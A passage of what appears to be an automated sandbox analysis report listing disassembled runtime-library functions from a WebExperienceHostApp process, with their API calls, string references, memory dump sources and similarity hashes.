Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

_Maklocstr.LIBCPMT ref: 00007FFDFBA646E7
_Maklocstr.LIBCPMT ref: 00007FFDFBA646FD
_Getvals.LIBCPMT ref: 00007FFDFBA647A2

Strings

true, xrefs: 00007FFDFBA646F6
false, xrefs: 00007FFDFBA646E0

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 2626534690-2658103896
Opcode ID: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
Instruction ID: a545c86e4418f456b7786cd634d27ed828a9400d9528ec935e7d636b58606cfd
Opcode Fuzzy Hash: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
Instruction Fuzzy Hash: 77418E26B09B4299F710CF74E4505ED33B1FB9874CB505226EE4D27AA9EF38D696C340

Function 00007FFE1320D490 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE1320CB59), ref: 00007FFE1320D553
DName::DName.LIBVCRUNTIME ref: 00007FFE1320D572

Strings

`template-parameter, xrefs: 00007FFE1320D580
void, xrefs: 00007FFE1320D4D6

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
Instruction ID: f41f6de5b5988c90809c92bbf6d02cfe66a0cafca77df79c2b311231946ec159
Opcode Fuzzy Hash: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
Instruction Fuzzy Hash: A9415C61F09F568CFB10ABA2D8502AD27B1BBA8BA8F540175DE0D27B65DF7CE149C700

Function 00007FFE1320A03C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A12F

Strings

short , xrefs: 00007FFE1320A0BC
long , xrefs: 00007FFE1320A09E
unsigned , xrefs: 00007FFE1320A103
char , xrefs: 00007FFE1320A0C5
int , xrefs: 00007FFE1320A0AD

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
Instruction ID: 53acf702c13d857a91bd2616fe0e782509e502a5336e4ef13241d2080f38ac6c
Opcode Fuzzy Hash: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
Instruction Fuzzy Hash: 83418272E18F568CF7159F26D9442BC37B1BBA9764F848275DA0C62B69DF3C9508C700

Function 00007FF625A12224 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF625A14F8E,?,?,00000000,00007FF625A12BE4), ref: 00007FF625A122AF
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF625A14F8E,?,?,00000000,00007FF625A12BE4), ref: 00007FF625A122C1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF625A14F8E,?,?,00000000,00007FF625A12BE4), ref: 00007FF625A12300
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF625A14F8E,?,?,00000000,00007FF625A12BE4), ref: 00007FF625A1230A
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF625A14F8E,?,?,00000000,00007FF625A12BE4), ref: 00007FF625A1231C

Strings

.dll, xrefs: 00007FF625A122B7, 00007FF625A12312

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID: .dll
API String ID: 2665656946-2738580789
Opcode ID: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
Instruction ID: 38452680da427607c162dafa28628909bdd32aa39c12130679dda80c2b771011
Opcode Fuzzy Hash: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
Instruction Fuzzy Hash: 3331B462B0474291DE209F26E8062A96361FF09FE0F548231DE6D8B7D5DE3CE541C355

Function 00007FFE13208334 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE132081B0: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE13208271

DName::operator+.LIBVCRUNTIME ref: 00007FFE132083E6

Strings

,<ellipsis>, xrefs: 00007FFE132083C4
..., xrefs: 00007FFE13208423
void, xrefs: 00007FFE13208458
<ellipsis>, xrefs: 00007FFE13208433
,..., xrefs: 00007FFE132083B4

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
Instruction ID: f366ab8a319d83e1b08512f650850c98927c90f8a30779209c3c8bcbfe9d3bfc
Opcode Fuzzy Hash: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
Instruction Fuzzy Hash: 05413E71E08F469CF7119B26D8402BD7BB0BBA8728F5445B5DA4C22776DFBC9548C740

Function 00007FFDFBA4BFA0 Relevance: 9.3, APIs: 6, Instructions: 339stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA4C039
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4C04C
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA4C061
memset.VCRUNTIME140_APP ref: 00007FFDFBA4C0ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4C3DF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4C42A

Part of subcall function 00007FFDFBA51DB0: memcpy.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFDFBA4C21C), ref: 00007FFDFBA51E0B
Part of subcall function 00007FFDFBA51DB0: memset.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFDFBA4C21C), ref: 00007FFDFBA51E18

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemsetstrcspn$localeconvmemcpy
String ID:
API String ID: 1584136638-0
Opcode ID: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
Instruction ID: 72b50d0a1f610f2de98695fe56179aa36463dc07f7d2484e71a2fff86a7314bb
Opcode Fuzzy Hash: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
Instruction Fuzzy Hash: 7FE1B526B1AA86C5FB01DB79C4646AC7371EB44B88F544132CE6D17BF9EEB8D54AC300

Function 00007FFDFBA70BAC Relevance: 9.2, APIs: 6, Instructions: 241COMMONLIBRARYCODE

Download Yara Rule

APIs

_FDunscale.LIBCPMT ref: 00007FFDFBA70BE7
_FDunscale.LIBCPMT ref: 00007FFDFBA70C9E

Part of subcall function 00007FFDFBA70A70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFDFBA6FAC4), ref: 00007FFDFBA70A79

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Dunscale$_errno
String ID:
API String ID: 2900277114-0
Opcode ID: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
Instruction ID: e541d85eac32e0f306fbdcaf9195e41ed575b0ae2c6dfd3ab9b1b9097793a5b5
Opcode Fuzzy Hash: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
Instruction Fuzzy Hash: F6A1DF33B0E2479AE720DE36D5A08BD7321FF1534CF644235EA19925E9DFB8B0A68700

Function 00007FFDFBA79170 Relevance: 9.2, APIs: 6, Instructions: 241COMMONLIBRARYCODE

Download Yara Rule

APIs

_Dunscale.LIBCPMT ref: 00007FFDFBA791AB
_Dunscale.LIBCPMT ref: 00007FFDFBA79263

Part of subcall function 00007FFDFBA70A70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFDFBA6FAC4), ref: 00007FFDFBA70A79

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Dunscale$_errno
String ID:
API String ID: 2900277114-0
Opcode ID: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
Instruction ID: 25b7a903da44857042c37b7f45d670f2f97245411b76ab1d2fc8c10fa521c82e
Opcode Fuzzy Hash: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
Instruction Fuzzy Hash: BEA1D433F1DA47AAD7119E34E4609BD3362FF56398F304236E61E165E8DFB8A0928340

Function 00007FFDFBA48ED0 Relevance: 9.2, APIs: 6, Instructions: 179COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA48F81

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
Instruction ID: 0f3adf4423f4b52a946155081d0c31a8fd98b1253c8d5e36b4afb2d6e4c65d45
Opcode Fuzzy Hash: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
Instruction Fuzzy Hash: AA817F72706A42DDEB548F29C4A47AC33A1FB48B98F555232EB2D437A8DFB9D564C300

Function 00007FFDFBA7BC10 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7C618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C63E
Part of subcall function 00007FFDFBA7C618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C6B6

_Xp_setn.LIBCPMT ref: 00007FFDFBA7BCD6
_Xp_setn.LIBCPMT ref: 00007FFDFBA7BD11
_Xp_addx.LIBCPMT ref: 00007FFDFBA7BD24
_Xp_setn.LIBCPMT ref: 00007FFDFBA7BDA2
_Xp_setn.LIBCPMT ref: 00007FFDFBA7BDDD
_Xp_addx.LIBCPMT ref: 00007FFDFBA7BDF1

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3490103321-0
Opcode ID: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
Instruction ID: 06500a2edf5e66b2bc481415c9b08a2a5961c732f4a8ed712d12eeb11151d5f8
Opcode Fuzzy Hash: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
Instruction Fuzzy Hash: 1661B166B1E94396E7519E61F4A0AFA7720FB84348F604132EA5E536EDDEBCD4098700

Function 00007FFDFBA7C3A0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7C618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C63E
Part of subcall function 00007FFDFBA7C618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C6B6

_Xp_setn.LIBCPMT ref: 00007FFDFBA7C466
_Xp_setn.LIBCPMT ref: 00007FFDFBA7C4A1
_Xp_addx.LIBCPMT ref: 00007FFDFBA7C4B4
_Xp_setn.LIBCPMT ref: 00007FFDFBA7C532
_Xp_setn.LIBCPMT ref: 00007FFDFBA7C56D
_Xp_addx.LIBCPMT ref: 00007FFDFBA7C581

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3490103321-0
Opcode ID: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
Instruction ID: bb374bdfbe74c70368171b8aaf8aa5aa83e91deb5d42f9e62a41a925ce3dae8b
Opcode Fuzzy Hash: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
Instruction Fuzzy Hash: F361D622B1EA4346E7119F61F460ABE7760FB84748F604132EE5E13AEDEEBDD5468700

Function 00007FFDFBA49990 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49A81
memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49A91
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA49AD0
memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49ADA
memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49AEA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFBA49B19

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
Instruction ID: a0af73052b087600b5f5e8b02fd0a43cbc468c92da9ee8bb8a070b02ebcb556f
Opcode Fuzzy Hash: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
Instruction Fuzzy Hash: 57410062B06A46D5EB149B16E8146A9B361EB08BE0F584731DE3D07BF9DEBCE156C300

Function 00007FFE13206310 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE13206366
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE132063A9
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE132063D3
InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FFE132063F0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE132063FC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE13206405

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
Instruction ID: 94b976e9b35ee2857cc60626c630f7230885df3d87a95ddadaaa0e94fe65b975
Opcode Fuzzy Hash: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
Instruction Fuzzy Hash: 2231E422B19F5188EB21EB27A80416D63A0FF98FF0B644575DE2D133A0EE3DE446C340

Function 00007FFDFBA42F00 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42F09
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42F1B
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42F2A
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42F90
___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42F9E
_wcsdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFDFBA45F46), ref: 00007FFDFBA42FB1

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
String ID:
API String ID: 490008815-0
Opcode ID: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
Instruction ID: 12409fc087a62e3173ce15b8126e02e17ff67aaa600f7b84e97722dacac6cf63
Opcode Fuzzy Hash: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
Instruction Fuzzy Hash: 6D214166E19B8683E7058F38C5112787360FBA9B0CF15A224CE9C0626ADF79E2E5C340

Function 00007FFE132038CC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0 ref: 00007FFE1320393C
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13203987
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13203BB5

Strings

RCC, xrefs: 00007FFE13203958
MOC, xrefs: 00007FFE13203950

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
Instruction ID: 0587e887a4675545f519252e256d683d64f09de99aedd32996485ab6e9a88a15
Opcode Fuzzy Hash: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
Instruction Fuzzy Hash: 55918173A08B858EE711DB66E4802AD77B0F794798F10416AEF8D27B65DF38D199CB00

Function 00007FFE1320B880 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320BB20

Strings

std::nullptr_t , xrefs: 00007FFE1320BAB0
volatile , xrefs: 00007FFE1320B8E7, 00007FFE1320BA18
volatile, xrefs: 00007FFE1320B8F6, 00007FFE1320BA27
std::nullptr_t, xrefs: 00007FFE1320BAD9

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
Instruction ID: d6d4b1c604e34188e78c1cfc63caabb6738be3475259c3bfd7d68bafcdebe525
